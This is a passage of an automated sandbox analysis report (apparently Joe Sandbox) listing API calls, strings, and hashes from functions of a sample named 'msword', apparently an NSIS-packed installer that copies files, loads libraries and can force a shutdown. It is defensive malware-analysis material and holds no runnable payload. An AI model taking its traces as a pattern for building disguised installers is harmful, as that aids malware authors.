CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

/D=, xrefs: 004039D2
NSIS Error, xrefs: 0040390E
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8
SeShutdownPrivilege, xrefs: 00403C42
\Temp, xrefs: 00403A47
Error launching installer, xrefs: 00403AA9

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Aborting: "%s", xrefs: 0040161D
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Jump: %d, xrefs: 00401602
Rename failed: %s, xrefs: 0040194B
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" (%d), xrefs: 004017BF
detailprint: %s, xrefs: 00401679
BringToFront, xrefs: 004016BD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
SetFileAttributes failed., xrefs: 004017A1
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename: %s, xrefs: 004018F8
Sleep(%d), xrefs: 0040169D
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" created, xrefs: 00401849

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

_Nb, xrefs: 00405AFD
RichEd32, xrefs: 00405BD4
@jG, xrefs: 00405AF2
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
.exe, xrefs: 00405A69
RichEdit, xrefs: 00405BF0
.DEFAULT\Control Panel\International, xrefs: 004059C5
"F, xrefs: 00405A4B
RichEdit20A, xrefs: 00405BE2, 00405BE7
F, xrefs: 00405A22
RichEd20, xrefs: 00405BC9

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,229,229,00000000,00000000,229,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93
File: error, user retry, xrefs: 00401B40
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
229, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: 229$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-2892758339
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Null, xrefs: 004036AA
Inst, xrefs: 00403698
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,004283D1,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

(]C, xrefs: 004033FD
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB
API String ID: 651206458-3635341587
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,004283D1,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(007DFD80), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
229, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
